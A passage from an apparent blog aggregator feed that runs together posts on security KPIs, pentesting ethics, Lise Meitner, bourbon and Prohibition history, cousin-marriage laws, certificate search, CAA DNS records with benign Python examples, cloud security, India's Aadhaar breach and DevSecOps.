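    within = sum(
        1 for _, released, applied in rows
        if applied is not None and (applied - released).days <= sla_days
    )
    return within / len(rows)
```

Rolled up per team or department, a number like this feeds a dashboard directly, which is exactly what a policy document on a shelf cannot do.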

Better Reporting and the Path to Accountability

Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.

This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.

There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs, too. In fact, thinking about pulling in SOAR capabilities and other monitoring and assessment capabilities and data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance risk vs reward in providing strategic guidance for addressing information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to nonetheless watch. But I have digressed...

---
The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.

Security is not a buzz-word business model, but our cumulative effort


This article conveys my personal opinion on security and its underlying revenue model; I would recommend reading it with a pinch of salt (+ tequila, while we are at it). I shall cover either side of the coin: heads, where pentesters try to give you a heads-up on underlying issues, and tails, where businesses still think they can address security at the tail-end of their development.

A recent conversation with a friend who's in information security triggered me to address the white elephant in the room. He works in a security services firm that provides intelligence feeds and alerts to clients. He shared a case where his firm didn't share the right feed at the right time, even though the client was "vulnerable", because the subscription model was different. I understand business is essential, but isn't security a collective effort? Tomorrow, when this client gets attacked, are you just going to turn a blind eye because it didn't pay you well? I understand that remediation always costs money (or more effort), but withholding an alert about an attack you witnessed in the wild, based on how much a client is paying you, is hard to defend.

I don't dream about the utopian world where security is obvious but we surely can walk in that direction.

What is security to a business?

Is it a domain, a pillar or, with the buzz these days, insurance? Information security and privacy, while being the talk of the town, still come in where the business requirements end. I understand there is a paradigm shift to the left, a movement towards the inception of your "bright idea", but we are still far from an ideal world, the utopia so to speak! I have experienced it from either side of the table - the one where we put ourselves in the shoes of hackers, and the contrary, where we hold hands with the developers to understand their pain points and work together to build a secure ecosystem. I would say it's been very few times that a business pays attention to "security" from day zero (yeah, this tells you the kind of clients I am dealing with, and why we are in business). Often business owners say - develop this application based on these requirements, discuss the revenue model and maintenance costs, and yeah! Check if we need these security add-ons, or whether we adhere to compliance checks, as no one wants auditors knocking at the door for all the wrong reasons.

This troubles me. Why don't we understand information security as important a pillar as your whole revenue model?


How is security as a business?

I have many issues with how "security" is being tossed around as a buzz-word to earn dollars, while very few respect the gravity or the very objective of its existence. Whether it's information, financial, or life security - they all have very real and quantifiable effects on someone's physical well-being. Every month I see tens (if not hundreds) of reports and advisories where the quality is embarrassingly bad. When you dig for the reasons - either the "good" firms are costly, or someone has a comfort zone with existing firms, or worst of all, the business neither cares nor pressures firms for better quality. In the end, it's just a plain and straightforward business transaction, or a compliance check to make the auditor happy.

Have you ever asked yourself these questions:

  1. You did a pentest, justifying the money paid with your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put in your best consultants/efforts because they were too expensive for the cause? That you didn't walk the extra mile because the budgeted hours ran out?
  2. Now, to you, Mr Business CEO - you want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, and security expenditure seems dubious to you. Next time, check how much companies have lost after getting breached. Just because it's not an urgent problem doesn't mean it can't become one; and if it does become a problem, chances are it's too late. These issues are like symptoms: if you see them, you already are in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it an epitome of "out of sight, out of mind". That's a significant risk you are taking with your revenue, employees and customers.

Now, while I have touched both sides of the problem in this short article, I hope you got the message (fingers crossed). Please do take security seriously, and not only as a business transaction! Every time you do something that involves security, on either side, think - what if you invest in the next big crypto-currency on an exchange/market that gets hacked because of its lack of due diligence? What if your medical records become public because someone didn't perform a good pentest? What if you lose your savings because your bank didn't do a thorough "security" check of its infrastructure? If you think you are untouchable because of your home router security, you, my friend, are living in an illusion. And my final rant, to the firms where there are good consultants but the reporting, or the seriousness in delivering the message to the business, is so fcuking messed up that all their efforts go in vain: take your deliverable seriously; it's the only window the business has to peep into the issues (existing or foreseen) and plan remediation in time.

That's all, my friends. Stay safe and be responsible; security is a cumulative effort and everyone has to be vigilant, because you never know where the next cyber-attack will be.

Meitnerium

Scientific American has a nice write-up of the theoretical physicist who discovered nuclear fission and was denied credit, yet assigned blame:

While the celebrity Meitner deserved was blatantly denied her, an undeserved association with the atomic bomb was bestowed. Meitner was outright opposed to nuclear weapons: “I will have nothing to do with a bomb!” Indeed, she was the only prominent Allied physicist to refuse an invitation to work on its construction at Los Alamos.

  • 1878 born in Vienna, Austria, third of eight children in middle-class family
  • 1892 at age 14 offered no more school, by 19th-century Austrian standards for girls. begins private lessons
  • 1905 earns PhD in physics from University of Vienna
  • 1907 moves to Berlin to access modern lab for research. denied her own lab because a woman, given an office in a basement closet, forced to use bathroom in a restaurant “down the street”
  • 1908 publishes three papers
  • 1909 publishes six papers
  • 1917 given salary and independent physics position
  • 1926 first woman in Germany to be made full professor
  • 1934 intrigued by Fermi work, begins research into nuclear reaction of uranium
  • 1938 Nazi regime forces her to leave Germany, because Jewish
  • 1944 Nobel prize awarded to the Berlin man who ran the lab she used for experiments

Amazing to see how determined she was and how she blazed a trail for others to do good. And yet the things she did, men wouldn’t give her credit for, while the thing she opposed was blamed on her instead.

Lost History of American Bourbon: Knob Creek

A friend recently went through my liquor cabinet and pulled out a mostly-empty bottle of Knob Creek. I had forgotten about it, although in the early-1990s it had been a favorite. It was introduced to me by a Milwaukee bartender in an old dark wooden dive of a bar on the city waterfront.

“I’ll take whatever” meant he poured me a glass of seltzer, stirred in a spoonful of very dark jam, threw an orange peel twist on top and told me “enjoy life, the old-fashioned way.” It sounded corny (pun not intended), especially when he also growled “this ain’t a bright lights and gin or vodka type place” (pre-prohibition, not a speakeasy).

“What’s with the jam?” I asked. He threw a thumb over his shoulder at a cast-iron looking tiny pot-belly stove against a black wall under a small brightly-lit window. I squinted. It was almost impossible to focus on except for its small red light. Steam was slowly rising from its top edges into the bright window. “Door County cherries” he said as he wiped the bar “pick’em myself. That’s my secret hot spiced mash.” This was an historic America, with heavy flavors from locally-grown ingredients, which contrasted sharply with what “popular” Milwaukee bars were serving (gin or vodka).

It was a very memorable drink. For years after I continued to have Knob Creek here and there, always thinking back fondly to that waterfront dive bar, and to the advice to avoid “bright lights and gin or vodka”. Knob Creek wasn’t exactly a replacement for the rye I really wanted, yet it was good-enough alternative, and I didn’t drink it fast enough to worry about its rather annoyingly high price of $15 a bottle.

Ok, so my friend pulls this old bottle of Knob Creek out of my cabinet. He’s drinking it and I’m telling him “no worries, that’s an old cheap bottle I can grab another…”. He chokes. “WHAAAT, nooo. Dude the Knob is one of Beam’s best, it’s a $50 bourbon. It’s the really good stuff.” Next thing I know my old Knob Creek bottle is in the recycling bin and I’m on the Internet wondering if I should replace it.

African-American Distillers May Have Invented Bourbon

A lot has changed in the world of American whiskey marketing since Knob Creek was $15

All the research I had done on Prohibition, a notoriously anti-immigrant white-supremacist movement targeting Germans and Irish, did not prepare me sufficiently for Jack Daniel’s recent adoption of its own history.

This year is the 150th anniversary of Jack Daniel’s, and the distillery, home to one of the world’s best-selling whiskeys, is using the occasion to tell a different, more complicated tale. Daniel, the company now says, didn’t learn distilling from Dan Call, but from a man named Nearis Green — one of Call’s slaves.

The real kicker to this Jack Daniel PR move is that it explains how master distillers came from Africa, and how slavery meant they ended up in regions that give them almost no credit today:

“[Slaves] were key to the operation in making whiskey,” said Steve Bashore, who helps run a working replica of Washington’s distillery. “In the ledgers, the slaves are actually listed as distillers.”

Slavery accompanied distilling as it moved inland in the late 18th century, to the newly settled regions that would become Tennessee and Kentucky.

[…]

American slaves had their own traditions of alcohol production, going back to the corn beer and fruit spirits of West Africa, and many Africans made alcohol illicitly while in slavery.

It makes sense, yet still I was surprised. And after I read that I started to pay attention to things I hadn’t noticed before. Like if you’ve ever watched “Hotel Rwanda” its opening song is “Umqombothi”, which has lyrics about a tradition of corn-mash used for beer in Africa.

Both the use of charred casks and corn mash foundations are being revealed by food historians as African traditions (even the banjo now, often associated with distilleries, is being credited to African Americans). Thus slaves from Africa are gradually being given credit as the true master distillers who brought Bourbon as a “distinctive product of the United States” to market.

Slave owners were not inclined to give credit, let alone keep records, so a lot of research unfortunately still is required to clarify what was going on between European and African traditions that ended up being distinctly American. That being said, common sense suggests a connection between African corn mash and master distiller role of African slaves that simply is too strong to ignore.

Prohibition Was Basically White Supremacists Perpetuating Civil War

If we recognize that master distillers using corn mash to invent Bourbon were most likely slaves from Africa, and also we recognize why and how Prohibition was pushed by the KKK, there is another connection too strong to ignore.

My studies had led me to believe anti-immigrant activists were behind banning the sale or production of alcohol in America. Now I see how this overlooks the incredibly important yet subtle point that master distillers were ex-slaves and their families on the verge of upward social mobility (Jack Daniel didn’t just take a recipe from Nearis Green, he hired two of his sons). The KKK pushed prohibition to block African American prosperity, as well as immigrants.

Let’s take this back a few years to look at the economics of prohibition. Attempts to ban alcohol had been tried by the British King to control his American colonies. In the 1730s a corporation of the King was charged with settling Georgia. Its corporate board (“trustees”) hoped to avoid what they saw as mistakes made in settling South Carolina. Most notably, huge plantations were thought to be undesirable because they caused social inequalities (ironic, I know). So the King’s corporation running Georgia looked at ways to force smaller parcels, to create a better distribution of wealth (lower concentrations of power) among settlers. The corporation also tried to restrict the use of Africans as slaves, to entice a harder-working, better quality of settler, and…believe it or not, they also tried to ban alcohol, presumably because of productivity loss.

These 1730s attempts to limit land grabs and ban slavery backfired spectacularly. It was South Carolinian settlers who were moving into Georgia to out-compete their neighbors, so it kind of makes sense that wealth was equated with grabbing land and throwing slaves at it rather than settlers doing the hard work themselves. It didn’t take more than ten years before the corporation relented and Georgia regressed to South Carolina’s low settler standards. The alcohol ban (restricting primarily rum) also turned out to be ineffective, because slaveowners simply pushed their slaves to distill new forms of alcohol from locally sourced ingredients (perhaps corn-based whisky) and smuggle it.

By the time a Declaration of Independence was being drafted, including some ideas about calling their King a tyrant for practicing slavery, it was elitist settlers of Georgia and South Carolina who demanded slavery not be touched. Perhaps it’s no surprise then 100 years later as Britain was finally banning slavery the southern states were still hung up about it and violent attacks were used to stop anyone even talking about abolishing slavery. While the rest of the Americas still under French, British, Spanish influence were banning slavery, the state of Georgia was on its way to declare Civil War in an expansionist attempt to spread slavery into America’s western territories.

So here’s the thing: the King’s corporation heads inadvertently had taught their colonies how slaves, alcohol and land were linked to wealth accumulation and power. White supremacists running government in Georgia and South Carolina (aspiring tyrants, jealous of the British King) wanted ownership for themselves to stay in power.

Prohibition thus denied non-whites entry to power and ensured racial inequality. Cheaters gonna cheat, and it seems kind of obvious in retrospect that prohibition by both the British King and the US government were clumsily designed to control the market.

The current era of bourbon enthusiasm is based on the products of about seven US distilleries. But before Prohibition, the US had thousands of distilleries! 183 in Kentucky alone. (When the Bottled-in-Bond act took effect in 1896, the nationwide count was reportedly over eight thousand). Each distillery produced many, many different brands.

Prohibition destroyed almost all of those historic distilleries.

From 8,000 small to 7 monster distilleries because…economic concerns of white supremacists running US government.

The KKK criminalized bourbon manufacturing. Thousands, including emancipated master distillers, were forced out of their field. Also in that Bottled-in-Bond year of 1896, incidentally, southern white-supremacists started erecting confederate monuments to terrorize the black population. By the time Woodrow Wilson was elected President in 1912 he summarily removed all blacks from federal government, which one could argue set the stage for a vote undermining black communities, and restarted the KKK by 1915. Prohibition thus arose within concerted efforts by white supremacists in America to reverse emancipation of African Americans, deny them social mobility, criminalize them arbitrarily, and disenfranchise them from government.

What’s War Got to Do With the Price of Knob Creek?

Have you ever heard of Otho Wathen’s defense of Whiskey during and after Prohibition?

Otho H. Wathen of National Straight Whiskey Distributing Co. points out: “The increase in 1934 (in drunken driver automobile accidents) for the entire country was 15.90 per cent. The increase in the repeal states, which included practically every big city where traffic is heaviest, was 14.65 per cent. …in the states retaining prohibition the increase was 21.56 per cent.”

I hadn’t heard of him until I read a blog post revealing that Knob Creek was a very old brand, bought inexpensively by National Distillers during the market collapse of Prohibition:

Knob Creek was first in use in 1898, by the Penn-Maryland Corp. I have looked through our archives here (I have the old history books from the companies we acquired when we purchased National Brands)

The blog even shows this “Cincinnati, Ohio” label as evidence of its antiquity:

This is an awkward bit of history, when you look at the origin story told by the Jim Beam conglomerate:

When the Prohibition was lifted in 1933, bourbon makers had to start from scratch. Whiskey takes years and years to make, but the drinking ban was overturned overnight. To meet their sudden demand, distillers rushed the process, selling barrels that had hardly been aged. Softer, mild-flavored whiskey became standard from then on. Full flavor was the casualty.

But we brought real bourbon back. Over 25 years ago, master distiller Booker Noe set out to create a whiskey that adhered to the original, time-tested way of doing things. He named it Knob Creek

They’ve removed the text about Knob Creek being a physical place. When I first bought a bottle it came with marketing that referenced Knob Creek Farm, a non-contiguous section of the Abraham Lincoln Birthplace National Historical Park. That’s definitely no longer the case (pun not intended) as all the marketing today says white distillers of Jim Beam are resurrecting pre-prohibition traditions, without specifying the traditions came from slaves.

From that perspective, I’m curious if anyone has looked into the Penn-Maryland decision to name its whiskey after an Abraham Lincoln landmark. Does it imply in some way the emancipation of distillers, which Beam now is claiming simply as pre-prohibition style? More to the point, if Jack Daniel is finding slavery in its origin story and making reference to the injustices of credit taken, will Beam take the hint or continue to call Knob Creek their recent innovation?

My guess, based on reading the many comments on the “post-age” Knob Creek now being made (the bottles used to say 9 year), is that Beam is moving further away from crediting the master distillers who were emancipated by Lincoln. So, to answer my original question, buying another bottle of Knob makes little sense until I see evidence they’re giving credit to America’s black master distillers who invented the flavor, and maybe even that label.

In the meantime, I’ll just keep sipping on this 1908 Old Crow (Woodford)…

Laws stopped cousin-marriage, not mobility

Collecting huge datasets for analysis has since the beginning of time been a good way to find insights. Recently some theories about safety and longevity of cousin marriage are being challenged by the power of big data systems:

researchers suggest that people stopped marrying their fourth cousins not due to increased mobility between different regions, but because the practice became less socially acceptable

“Less socially acceptable” is another way of saying laws against it were being passed. According to the seminal book on this subject, by someone with the same name as me, mathematical modeling shows how those laws against cousin marriage were based in prejudice, not science.

Forbidden Relatives challenges the belief – widely held in the United States – that legislation against marriage between first cousins is based on a biological risk to offspring. In fact, its author maintains, the U.S. prohibition against such unions originated largely because of the belief that it would promote more rapid assimilation of immigrants.

Immigrants were barred from continuing their historic practices, much in the same way prohibition of alcohol criminalized Germans for their breweries and the Irish for their distilleries. Keep these reports and books in mind the next time someone says cousin marriage is a concern for human safety or longevity.

How to filter and query SSL/TLS certs for intelligence


Recently I noticed a new service/project that is turning heads among my peers in the security community - CertDB. One of its kind, it indexes domains' SSL certificates along with their details: IP records, geo-location, timelines, common names, etc. They term themselves an Internet-wide search engine for digital certificates. Their business statement becomes unique once you understand the different components (search vectors) they are incorporating into this project. I know there are a few certificate transparency registries like Certificate Search, but as per their website,

Examining the data hidden in digital certificates provides a lot of insight about business activity in a particular geography or even collaboration between 2 different companies.

I agree that these insights come in handy while performing reconnaissance during a security assessment, or while validating the SSL/TLS certificates for a client. A certificate can reveal, for example, that it is about to expire, or that new domains have been registered under the same certificate (e.g., Subject Alternative Name: DNS Name). But when I browsed through their project website, I was surprised by the way they articulated their USP (unique selling point),

For example, the registration of a new unknown domain in Palo Alto hints at a new start-up; switching from the "Wildcard" certificate to "Let's Encrypt" tells us about the organization's budget constraints; issuing a certificate in an organization with domains of another organization speaks about collaboration between companies, or even at an acquisition of one company by another.
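These kinds of signals can be pulled straight out of a certificate. As a minimal sketch, assuming we already have a certificate dict shaped like the output of Python's `ssl.SSLSocket.getpeercert()` (the values below are made up for illustration), expiry and Subject Alternative Names are a few lines of stdlib code:

```python
import ssl
from datetime import datetime, timezone

# A certificate dict shaped like the output of ssl.SSLSocket.getpeercert();
# the hostnames and dates below are illustrative, not a real certificate.
cert = {
    "notAfter": "Dec 31 23:59:59 2030 GMT",
    "subjectAltName": (
        ("DNS", "example.com"),
        ("DNS", "staging.example.com"),  # a freshly added SAN is a signal
    ),
}

def days_until_expiry(cert):
    """Days remaining before the certificate's notAfter timestamp."""
    expires = ssl.cert_time_to_seconds(cert["notAfter"])
    now = datetime.now(timezone.utc).timestamp()
    return int((expires - now) // 86400)

def dns_names(cert):
    """All DNS names listed in the Subject Alternative Name extension."""
    return [val for (kind, val) in cert.get("subjectAltName", ()) if kind == "DNS"]

print(days_until_expiry(cert))
print(dns_names(cert))
```

Run this over a feed of newly observed certificates and both signals from the quote above (expiry pressure, new domains sharing a certificate) fall out of the data.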

Now, I am intrigued to do a detailed article on their services, business model, filters and even an interview with their project team.

Question: Are you curious/interested, and what would you like to ask them? Do leave a comment.


Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS


It's been a long time since I audited someone's DNS zone file, but recently, while checking a client's DNS configuration, I was surprised to find the CAA records set randomly, "so to speak". I discussed it with the administrator and was surprised that he had no clue what CAA is, how it works, and why it is so important to configure it correctly. That made me wonder how many of us actually know this, and how CAA can be a savior if someone attempts to get an SSL certificate for your domain.

What is CAA?

CAA, or Certificate Authority Authorization, is a record that identifies which certificate authorities (CAs) are allowed to issue certificates for the domain in question. It is declared via the CAA record type in DNS, is publicly viewable, and can be verified by a certificate authority before issuing a certificate.

Brief Background

While the first draft was documented by Phillip Hallam-Baker and Rob Stradling back in 2010, work accelerated in the last 5 years due to CA compromises and related attacks. The first CA subversion was in 2001, when VeriSign issued 2 certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation". These certificates could have been used to spoof identity, deliver malicious updates, etc. Then in 2011, fraudulent certificates were issued by Comodo[1] and DigiNotar[2] after they were attacked by Iranian hackers (more on the Comodo attack, and the Dutch DigiNotar attack); there is evidence of their use in a MITM attack in Iran.

Further, in 2012, Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So it's high time CAs were restricted, or whitelisted, at the domain level.

What if no CAA record is configured in DNS?

Simply put, the CAA record should be configured to announce which certificate authorities are permitted to issue a certificate for your domain. If no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice to restrict your CA presence, and their power(s) to legally issue certificate for your domain. It's like whitelisting them in your domain!

The process now mandates[4] that a Certificate Authority query DNS for your CAA record (yes, it's mandatory now!), and a certificate can only be issued for your hostname if either no record is available or that CA has been "whitelisted". The CAA record sets the rules for the parent domain, and the same are inherited by sub-domains (unless otherwise stated in the DNS records).

Certificates authorities interpret the lack of a CAA record to authorize unrestricted issuance, and the presence of a single blank issue tag to disallow all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value>, where the fields have the following meaning,

Field Usage
flag An unsigned integer (0-255) as defined in RFC 6844[6]. Currently it is only used for the critical flag (value 128).[7]
tag An ASCII string (issue, issuewild, iodef) which identifies the property represented by the record.
value The value of the property defined in the <tag>

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: Explicitly authorizes a single certificate authority to issue any type of certificate for the domain in scope.
  • issuewild: Explicitly authorizes a single certificate authority to issue only wildcard certificates for the domain in scope.
  • iodef: Specifies where certificate authorities should report certificate requests or issuances that violate the CAA policy defined in the DNS records (options: mailto:, http:// or https://).
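The tag semantics above translate into a short issuance check. Here is a simplified sketch of the RFC 6844 logic, not a complete implementation: it assumes the CAA records for the domain have already been fetched from DNS as '<flag> <tag> "<value>"' strings, and it ignores tree climbing and the critical flag for brevity.

```python
def parse_caa(record):
    # Split '<flag> <tag> "<value>"' into its three fields.
    flag, tag, value = record.split(None, 2)
    return int(flag), tag.lower(), value.strip('"')

def may_issue(ca_domain, records, wildcard=False):
    """Return True if the CA identified by ca_domain may issue a certificate."""
    parsed = [parse_caa(r) for r in records]
    tag = "issuewild" if wildcard else "issue"
    relevant = [v for (_, t, v) in parsed if t == tag]
    if wildcard and not relevant:
        # No issuewild records: wildcard requests fall back to the issue tag.
        relevant = [v for (_, t, v) in parsed if t == "issue"]
    if not relevant:
        # No applicable issue/issuewild records: issuance is unrestricted.
        return True
    # A blank issue value (e.g. 0 issue ";") matches no CA, disallowing all.
    return ca_domain in relevant

records = ['0 issue "letsencrypt.org"', '0 iodef "mailto:hello@cybersins.com"']
print(may_issue("letsencrypt.org", records))  # True
print(may_issue("evil-ca.example", records))  # False
print(may_issue("any-ca.example", []))        # True: no CAA record at all
```

Note how the two edge cases from the quote above fall out of the same few lines: an empty record set authorizes everyone, while a blank issue tag authorizes no one.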
DNS Software Support

As per an excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B), Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy and Google Cloud DNS.

Example: (my own website DNS)

As per my policy, I have configured ONLY "letsencrypt.org" to issue certificates, but due to Cloudflare Universal SSL support, the following certificate authorities get configured as well,

  • 0 issue "comodoca.com"
  • 0 issue "digicert.com"
  • 0 issue "globalsign.com"
  • 0 issuewild "comodoca.com"
  • 0 issuewild "digicert.com"
  • 0 issuewild "globalsign.com"


Also, configured iodef for violation: 0 iodef "mailto:hello@cybersins.com"

How's the WWW doing with CAA?

After the auditing exercise, I was curious to know how the top 10,000 Alexa websites are doing with CAA, and strangely enough I was surprised by the results: only 4% of the top 10K websites have a CAA DNS record.


[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

We still have a long way to go with new security flags and policies like the "CAA DNS Record", the "security.txt" file, etc., and I shall keep covering these topics to evangelize security in all possible ways without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.


  1. Comodo CA attack by Iranian hackers: https://arstechnica.com/information-technology/2011/03/independent-iranian-hacker-claims-responsibility-for-comodo-hack/ ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: https://arstechnica.com/information-technology/2011/08/earlier-this-year-an-iranian/ ↩︎

  3. Trustwave Subroot Certificate: http://www.h-online.com/security/news/item/Trustwave-issued-a-man-in-the-middle-certificate-1429982.html ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: https://cabforum.org/pipermail/public/2017-March/009988.html ↩︎

  5. Wikipedia Article: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization ↩︎

  6. IETF RFC 6844 on CAA record: https://tools.ietf.org/html/rfc6844 ↩︎

  7. The confusion of critical flag: https://tools.ietf.org/html/rfc6844#section-7.3 ↩︎

  8. Wikipedia Support Section: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization#Support ↩︎

New World, New Rules: Securing the Future State

I published an article today on the Oracle Cloud Security blog that takes a look at how approaches to information security must adapt to address the needs of the future state (of IT). For some organizations, it's really the current state. But, I like the term future state because it's inclusive of more than just cloud or hybrid cloud. It's the universe of Information Technology the way it will be in 5-10 years. It includes the changes in user behavior, infrastructure, IT buying, regulations, business evolution, consumerization, and many other factors that are all evolving simultaneously.

As we move toward that new world, our approach to security must adapt. Humans chasing down anomalies by searching through logs is an approach that will not scale and will not suffice. I included a reference in the article to a book called Afterlife. In it, the protagonist, FBI Agent Will Brody says "If you never change tactics, you lose the moment the enemy changes theirs." It's a fitting quote. Not only must we adapt to survive, we need to deploy IT on a platform that's designed for constant change, for massive scale, for deep analytics, and for autonomous security. New World, New Rules.

Here are a few excerpts:
Our environment is transforming rapidly. The assets we're protecting today look very different than they did just a few years ago. In addition to owned data centers, our workloads are being spread across multiple cloud platforms and services. Users are more mobile than ever. And we don’t have control over the networks, devices, or applications where our data is being accessed. It’s a vastly distributed environment where there’s no single, connected, and controlled network. Line-of-Business managers purchase compute power and SaaS applications with minimal initial investment and no oversight. And end-users access company data via consumer-oriented services from their personal devices. It's grown increasingly difficult to tell where company data resides, who is using it, and ultimately where new risks are emerging. This transformation is on-going and the threats we’re facing are morphing and evolving to take advantage of the inherent lack of visibility.
Here's the good news: The technologies that have exacerbated the problem can also be used to address it. On-premises SIEM solutions based on appliance technology may not have the reach required to address today's IT landscape. But, an integrated SIEM+UEBA designed from the ground up to run as a cloud service and to address the massively distributed hybrid cloud environment can leverage technologies like machine learning and threat intelligence to provide the visibility and intelligence that is so urgently needed.
Machine Learning (ML) mitigates the complexity of understanding what's actually happening and of sifting through massive amounts of activity that may otherwise appear to humans as normal. Modern attacks leverage distributed compute power and ML-based intelligence. So, countering those attacks requires a security solution with equal amounts of intelligence and compute power. As Larry Ellison recently said, "It can't be our people versus their computers. We're going to lose that war. It's got to be our computers versus their computers."
Click to read the full article: New World, New Rules: Securing the Future State.

Indian government, faced with massive data breach, targets journalists

Instead of rushing to fix the problem that has exposed the private information of over a billion Indians, it is criminally investigating the journalists who exposed it.
Leszek Leszczynski

In the course of an extremely disturbing data breach, the Indian government has potentially violated the privacy of over one billion of its citizens. Now, instead of rushing to fix the problem that has exposed the private information of over 90% of Indians, it is criminally investigating the journalists who brought it to the public’s attention.

A branch of the Indian government filed a police complaint last week launching an investigation into journalist Rachna Khaira and the Tribune of India, after the publication released a report describing what looks to be a massive vulnerability in a government database that is being exploited by an unknown group to sell highly sensitive and private data about Indian citizens.

Khaira wrote an article on January 4 detailing how reporters were able to easily purchase access to the personal information of over one billion Indian citizens from the national identity database—for the price of approximately $8 USD. She bought the access from an unknown seller, and settled the small fee via digital payment. The Unique Identification Authority of India (UIDAI), which manages the database, initially denied the breach of the system before filing a complaint against the journalist and her publication and accusing them of criminal conspiracy.  

The Aadhaar database is the largest of its kind in the world, and contains both biometric data like fingerprints and personal details like addresses and phone numbers that, when combined, build unique and detailed profiles of its citizens. Participation in the database is required to access basic services like filing tax returns, and this normalization of government collection and retention of such intimate data raises serious civil liberties and privacy concerns.

The Tribune reported that this isn’t the first time the database has been breached, and that the UIDAI is aware of past unauthorized attempts to access the database. Many Indian privacy advocates have long been warning that exactly this type of worst case scenario would occur.

At a minimum, the size and sensitivity of this system should make its security a paramount priority for UIDAI, since this concentration of identifying information makes it extremely susceptible to exploitation. So far, the agency hasn’t addressed the vulnerability or closed the loopholes in the system discovered by security researchers and journalists, but rather attacked the press for doing its job.   

The police complaint, called a First Information Report, has been widely condemned by human rights and press freedom organizations, including the Editors Guild of India and Amnesty International. Edward Snowden, Freedom of the Press Foundation’s board president, wrote on Twitter this week:

“The journalists exposing the #Aadhaar breach deserve an award, not an investigation. If the government were truly concerned for justice, they would be reforming the policies that destroyed the privacy of a billion Indians. Want to arrest those responsible? They are called @UIDAI.”

After an outpouring of public criticism over its response to the breach, UIDAI tweeted on January 8 claiming to defend journalism. “UIDAI is committed to the freedom of Press. We're going to write to @thetribunechd & @rachnakhaira to give all assistance to investigate to nab the real culprits. We also appreciate if Tribune & its journalist have any constructive suggestion to offer.”

Despite this statement, UIDAI continues to investigate Khaira and the Tribune under the Aadhaar Act.

The targeting of Khaira and the Tribune by UIDAI is just the latest example of attempts to curb press freedom and stifle investigative journalism in India. Last year, the UIDAI filed an FIR against a CNN-News 18 journalist for a report on how it was possible to obtain two separate Aadhaar enrollment numbers. Courts allow public figures to bring spurious defamation lawsuits against publications such as The Wire that are meant to stifle critical reporting. The Indian government regularly uses a draconian sedition law to censor the press, particularly when it investigates state corruption.

India ranked 136th in the World Press Freedom Index in 2017, a decline from 2016. According to the Committee to Protect Journalists, at least 75 journalists were killed in India between 1992 and 2018. Veteran journalist Gauri Lankesh, who was known for her critical reporting on inequality and racial discrimination, was recently murdered in front of her house.

The Indian government has a responsibility to vigorously defend the press in both words and actions. As long as it targets journalists and newspapers for reporting information vital to the public interest rather than acting to protect the privacy of its citizens, the UIDAI cannot seriously claim to defend democracy and the free press.


DevSecOps is coming! Don’t be afraid of change.


There has been a lot of buzz about the relationship between Security and DevOps, as if their happy companionship were up for debate. To me they are soulmates, and DevSecOps, applied wisely, is a workable, scalable, and quantifiable fact, not a magic button.

What is DevOps?

The development cycle has undergone considerable changes in the last few years. Customers and clients have evolving requirements, and the market demands speed and quality. The relationship between developers and operations has grown much closer to address this change. IT infrastructure has evolved in parallel to cater to quick timelines and release cycles. The old legacy infrastructure with multiple toll gates is drifting away, and fast, responsive APIs are taking its place to spawn and scale vast numbers of software and hardware instances.

Developers, who were already getting closer to the operations team, have now decided to wear both hats and skip a 'redundant' hop. This integration has helped organisations achieve quick releases with better application stability and response times. Now the demands of the customer or end-user can be addressed and delivered directly by the DevOps team. Sometimes people confuse Agile and DevOps, and it's natural given the ever-changing landscape.

Simply put, Agile is a methodology and is about processes (scrums, sprints etc.) while DevOps is about technical integration (CI/CD, tool and IT automation)

While Agile talks about the SDLC, DevOps also integrates Operations and brings fluidity to Agile. It focuses on being closer to the customer, not just committing working software. DevOps has in its arsenal many tools that support release, monitoring, management, virtualisation, automation, and orchestration of the different parts of delivery, making it fast and efficient. It's the need of the hour given the constant changes in requirements and ecosystem. It has to evolve and release ongoing updates to keep up with the pace of customer and market demands. It's not a mono-directional water flow; instead, it's like an omnidirectional tube of water flowing in a gravity-free ecosystem.

What is DevSecOps?

